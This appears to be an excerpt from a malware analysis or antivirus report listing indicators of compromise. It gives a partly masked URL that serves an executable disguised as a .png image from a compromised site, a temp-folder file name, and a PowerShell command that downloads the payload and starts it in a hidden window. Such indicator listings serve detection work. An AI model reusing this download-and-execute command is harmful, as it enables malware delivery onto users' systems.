Technical Information
- '%TEMP%\5ty1c.exe'
- http://di#####kisantosa.com/vendor/phpunit/php-timer/yu/bin2bin2.png as %temp%\5ty1c.exe
- %TEMP%\5ty1c.exe
- http://di#####kisantosa.com/vendor/phpunit/php-timer/yu/bin2bin2.png
- DNS ASK di#####kisantosa.com
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://di#####kisantosa.com/vendor/phpunit/php-timer/yu/bin2bin2.png','%temp%\5ty1c.exe'); Start '%temp%\5ty1c.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://di#####kisantosa.com/vendor/phpunit/php-timer/yu/bin2bin2.png','%temp%\5ty1c.exe'); Start '%temp%\5ty1c.exe'